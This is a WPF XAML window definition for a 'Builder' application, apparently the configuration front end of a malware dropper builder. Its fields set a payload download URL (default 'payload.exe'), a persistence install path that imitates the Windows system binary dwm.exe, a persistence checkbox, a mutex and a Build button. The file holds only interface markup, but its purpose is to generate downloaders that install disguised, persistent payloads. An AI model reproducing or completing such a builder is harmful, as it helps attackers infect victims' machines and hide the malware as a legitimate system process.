Builder/Windows/MainWindow.xaml

<Window x:Class="Builder.Windows.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        Title="Builder" WindowState="Normal" WindowStyle="ToolWindow" ResizeMode="NoResize" Background="White" Width="300" Height="360" WindowStartupLocation="CenterScreen">
    <Grid Margin="20">
        <Grid.RowDefinitions>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="20"/>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="5"/>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="Auto"/>
            <RowDefinition Height="Auto"/>
        </Grid.RowDefinitions>

        <TextBlock Text="Download URL" FontSize="16" Margin="0,10,0,5" TextAlignment="Center" Grid.Row="0"/>
        <TextBox x:Name="downloadBox" Margin="0,0,0,10" Height="20" Grid.Row="1" Text="http://127.0.0.1/payload.exe" TextAlignment="Center"/>

        <TextBlock Text="Persistence install path" FontSize="16" Margin="0,10,0,5" TextAlignment="Center" Grid.Row="3"/>
        <TextBox x:Name="persistenceBox" TextAlignment="Center" Text="C:\Windows\dwm.exe" Margin="0,0,0,10" Height="20" Grid.Row="4" IsEnabled="False"/>

        <CheckBox x:Name="checkInstall" Content="Enable persistence" HorizontalAlignment="Center" VerticalAlignment="Center" Margin="0,0,0,10" Grid.Row="6"/>

        <TextBlock Text="Mutex" FontSize="16" Margin="0,10,0,5" TextAlignment="Center" Grid.Row="10"/>
        <TextBox x:Name="mutexBox" TextAlignment="Center" MouseEnter="mutexBox_MouseEnter" Margin="0,0,0,10" Height="20" Grid.Row="11"/>

        <Button Content="Build" Click="Button_Click" Margin="0,0,0,10" Height="30" Grid.Row="9"/>
    </Grid>
</Window>
